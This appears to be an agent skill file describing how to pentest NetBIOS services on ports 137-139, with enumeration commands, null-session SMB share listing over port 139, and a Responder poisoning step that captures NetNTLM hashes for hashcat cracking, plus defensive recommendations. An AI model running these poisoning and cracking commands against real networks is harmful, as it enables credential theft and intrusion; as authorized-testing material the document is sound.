pentesting-netbios
$
npx mdskill add xalgord/xalgorix/pentesting-netbios- During authorized internal network assessments when UDP 137, UDP 138, or TCP 139 is reachable - When mapping Windows hosts on a LAN by NetBIOS name, workgroup/domain, and MAC address - When TCP 445 is filtered but 139 is open (SMB over NetBIOS still works) - As an early reconnaissance step before SMB/Active Directory enumeration - When investigating NBT-NS/LLMNR poisoning opportunities for credential capture
SKILL.md
.github/skills/pentesting-netbiosView on GitHub ↗
--- name: pentesting-netbios description: Testing NetBIOS over TCP/IP services during authorized engagements. Covers the NetBIOS Name Service (137/udp, 137/tcp), Datagram Service (138/udp), and Session Service (139/tcp). Focuses on name and MAC enumeration with nmblookup, nbtscan and nmap nbstat, identifying workgroups/domains, and pivoting to SMB over NetBIOS (139) for share and user enumeration. domain: cybersecurity subdomain: network-services-pentesting tags: - penetration-testing - network-services - netbios - smb - windows - enumeration version: '1.0' author: xalgorix license: Apache-2.0 --- # Pentesting NetBIOS (ports 137/138/139) ## When to Use - During authorized internal network assessments when UDP 137, UDP 138, or TCP 139 is reachable - When mapping Windows hosts on a LAN by NetBIOS name, workgroup/domain, and MAC address - When TCP 445 is filtered but 139 is open (SMB over NetBIOS still works) - As an early reconnaissance step before SMB/Active Directory enumeration - When investigating NBT-NS/LLMNR poisoning opportunities for credential capture ## Quick Enumeration ```bash # Names the server uses + MAC address (Name Service, 137) nmblookup -A <IP> nbtscan <IP>/30 nbtscan -r 192.168.0.1/24 # scan a /24 quickly sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP> # Session service banner (139) — confirms SMB-over-NetBIOS nmap -p139 -sV <IP> # Expected: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn # Name service banner (137/udp) # Expected: 137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP) ``` ## Critical: Checks Most Often Missed 1. **Workgroup vs domain disclosure** — the NetBIOS name table reveals the workgroup or NT domain (`<1C>`/`<00>` group entries), giving you the AD/workgroup name for free before touching SMB. 2. **MAC address leak** — `nbtscan`/`nbstat` return the server MAC, useful for vendor fingerprinting and pivoting. 3. **Unique vs group name suffixes** — suffix bytes identify roles: `<00>` workstation, `<20>` File Server (SMB enabled), `<1B>` Domain Master Browser (often the PDC), `<1C>` Domain Controllers group. A `<20>` means the host serves SMB — pivot to share enumeration. 4. **SMB still reachable on 139** — if 445 is filtered, 139 (NBT over IP) frequently still exposes the full SMB attack surface. Point your SMB tooling at port 139. 5. **NBT-NS poisoning surface** — broadcast name resolution on 137/udp can be poisoned with Responder to capture NetNTLM hashes on the segment. How to CONFIRM: NetBIOS is confirmed when `nmblookup -A <IP>` returns a name table (lines with `<XX>` suffixes) or `nbtscan` lists the name and MAC. A `<20>` suffix confirms the host runs an SMB file server reachable over 139. ## Workflow ### Step 1: Enumerate (names, workgroup/domain, MAC) ```bash # Resolve the name table for a single host nmblookup -A <IP> # Read the suffixes: # <00> UNIQUE -> workstation / hostname # <00> GROUP -> workgroup / domain name # <20> UNIQUE -> SMB file server service running # <1B> UNIQUE -> Domain Master Browser (likely PDC) # <1C> GROUP -> Domain Controllers # <1D> UNIQUE -> Master Browser # Sweep a subnet for live NetBIOS hosts nbtscan -r 192.168.0.0/24 sudo nmap -sU --script nbstat.nse -p137 -Pn -n 192.168.0.0/24 ``` ### Step 2: Identify roles and reachable SMB ```bash # Confirm session service (SMB over NetBIOS) on 139 nmap -p139,445 -sV <IP> # If 445 is filtered but 139 is open, drive SMB tooling at 139 smbclient -p 139 --no-pass -L //<IP> smbmap -P 139 -H <IP> rpcdump.py -port 139 [[domain/]username[:password]@]<IP> # map RPC endpoints over 139 ``` ### Step 3: Pivot to SMB enumeration ```bash # Once a <20> (file server) host is found, enumerate shares/users over NetBIOS enum4linux-ng -A <IP> smbclient --no-pass -L //<IP> crackmapexec smb <IP> --port 139 -u '' -p '' --shares # See the pentesting-smb skill for full share/user/credential workflow ``` ### Step 4: Name-service poisoning (capture credentials) ```bash # Poison broadcast NBT-NS/LLMNR requests to capture NetNTLM hashes sudo responder -I <iface> -wv # Crack captured hashes offline or relay (see SMB relay in pentesting-smb) hashcat -m 5600 captured_netntlmv2.txt wordlist.txt ``` ## Key Concepts | Concept | Description | |---------|-------------| | **Name Service (137)** | Registers and resolves NetBIOS names; queried to obtain names and MAC (137/udp and 137/tcp) | | **Datagram Service (138)** | Connectionless communication and broadcast messaging (138/udp) | | **Session Service (139)** | Connection-oriented service carrying SMB over NetBIOS (139/tcp) | | **NetBIOS name** | Up to 16 characters; the 16th byte is a suffix identifying the service/role | | **Name suffixes** | `<00>` workstation/workgroup, `<20>` file server, `<1B>` domain master browser, `<1C>` DC group | | **NBT over IP vs SMB over IP** | Port 139 is NBT over IP; port 445 is SMB directly over TCP/IP | | **NBT-NS poisoning** | Spoofing broadcast name responses to capture NetNTLM authentication | ## Tools & Systems | Tool | Purpose | |------|---------| | **nmblookup** | Resolve a host's NetBIOS name table and roles (`-A <IP>`) | | **nbtscan** | Fast subnet sweep returning NetBIOS names and MAC addresses | | **nmap** (nbstat.nse) | Scriptable name-table enumeration over UDP 137 | | **enum4linux-ng** | Aggregated NetBIOS/SMB enumeration once a file server is found | | **smbclient / smbmap** | SMB access over port 139 when 445 is filtered | | **Responder** | NBT-NS/LLMNR poisoning to capture NetNTLM hashes | | **impacket rpcdump.py** | Map MSRPC endpoints over NetBIOS (port 139) | ## Common Scenarios ### Scenario 1: Domain Discovery on a Flat LAN `nbtscan -r 10.0.0.0/24` returns each host's NetBIOS name and a `<1C>` group entry exposing the AD domain name, immediately scoping the Active Directory environment. ### Scenario 2: 445 Filtered, 139 Open A hardened host blocks 445 but leaves 139 open. Pointing `smbclient -p 139 --no-pass -L //<IP>` at the session service still enumerates shares, bypassing the partial filtering. ### Scenario 3: File Server Identification `nmblookup -A <IP>` shows a `<20>` suffix, confirming the host runs an SMB file server. The tester pivots to share enumeration and finds a readable backup share. ### Scenario 4: Credential Capture via NBT-NS Responder answers broadcast NetBIOS name queries for mistyped hostnames, capturing NetNTLMv2 hashes that are cracked offline to recover a domain user password. ## Output Format ``` ## NetBIOS Finding **Service**: NetBIOS over TCP/IP **Severity**: <Medium|Low|Informational> **Host**: <IP> (137/udp, 138/udp, 139/tcp) ### Summary <What was disclosed: hostname, workgroup/domain, MAC, file-server role, poisoning exposure> ### Name Table | Name | Suffix | Type | Meaning | |------|--------|------|---------| | WIN-DC01 | <00> | UNIQUE | Hostname | | CORP | <1C> | GROUP | Domain Controllers (domain = CORP) | | WIN-DC01 | <20> | UNIQUE | SMB file server active | MAC address: <xx:xx:xx:xx:xx:xx> ### Evidence - Command: nmblookup -A <IP> - Output: <name table excerpt> ### Recommendation 1. Disable NetBIOS over TCP/IP where not required (use DNS/SMB direct on 445) 2. Disable LLMNR and NBT-NS broadcast resolution to prevent poisoning 3. Restrict 137-139 to trusted management segments 4. Enable SMB signing to mitigate relay of captured NetNTLM hashes ```